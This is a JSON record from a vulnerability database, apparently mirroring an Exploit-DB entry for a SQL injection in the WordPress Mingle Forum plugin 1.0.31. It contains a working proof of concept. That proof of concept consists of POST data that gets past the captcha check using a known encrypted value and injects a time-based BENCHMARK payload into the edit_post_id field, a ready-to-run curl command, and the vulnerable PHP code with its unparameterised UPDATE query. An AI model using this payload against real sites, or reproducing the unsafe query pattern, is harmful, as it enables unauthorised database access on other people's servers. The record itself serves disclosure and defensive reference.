DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:17894", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Plugin Mingle Forum 1.0.31 - SQL Injection", "description": "", "published": "2011-09-27T00:00:00", "modified": "2011-09-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/17894", "reporter": "Miroslav Stampar", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T06:43:16", "viewCount": 10, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "wpvulndb", "idList": ["WPVDB-ID:C4A99AFB-C138-4B13-9E75-4D52701BA730"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "sourceHref": "https://www.exploit-db.com/download/17894", "sourceData": "# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability\r\n# Date: 2011-09-19\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip\r\n# Version: 1.0.31 (tested)\r\n# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']\r\n\r\n---------------\r\nPoC (POST data)\r\n---------------\r\nhttp://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php\r\n wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)\r\n\r\ne.g.\r\ncurl --data \"wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)\" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php\r\n\r\n---------------\r\nVulnerable code\r\n---------------\r\n if (!isset($_POST['edit_post_submit'])) {\r\n $errormsg = apply_filters('wpwf_check_guestinfo',\"\");\r\n if ($errormsg != \"\") {\r\n $error = true;\r\n wp_die($errormsg);\r\n }\r\n }\r\n\r\n if($options['forum_captcha'] == true && !$user_ID){\r\n include_once(WPFPATH.\"captcha/shared.php\");\r\n $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt(\"MhWNow==\") == \"fail\"\r\n if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {\r\n // do nothing\r\n }\r\n else {\r\n $error = true;\r\n $msg = __(\"Security code does not match\", \"mingleforum\");\r\n wp_die($msg);\r\n }\r\n }\r\n\r\n ...\r\n\r\n if(isset($_POST['edit_post_submit'])){\r\n $myReplaceSub = array(\"'\", \"\\\\\");\r\n $subject = str_replace($myReplaceSub, \"\", $mingleforum->input_filter($_POST['edit_post_subject']));\r\n $content = $mingleforum->input_filter($_POST['message']);\r\n $thread = $mingleforum->check_parms($_POST['thread_id']);\r\n $edit_post_id = $_POST['edit_post_id'];\r\n\r\n if($subject == \"\"){\r\n $msg .= \"<h2>\".__(\"An error occured\", \"mingleforum\").\"</h2>\";\r\n $msg .= (\"<div id='error'><p>\".__(\"You must enter a subject\", \"mingleforum\").\"</p></div>\");\r\n $error = true;\r\n }\r\n elseif($content == \"\"){\r\n $msg .= \"<h2>\".__(\"An error occured\", \"mingleforum\").\"</h2>\";\r\n $msg .= (\"<div id='error'><p>\".__(\"You must enter a message\", \"mingleforum\").\"</p></div>\");\r\n $error = true;\r\n }\r\n\r\n if ($error) wp_die($msg);\r\n\r\n //SECURITY FIX NEEDED <-- actual author's comment :)\r\n $sql = (\"UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id\");\r\n $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)", "osvdbidlist": ["75791"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645265310}}

{}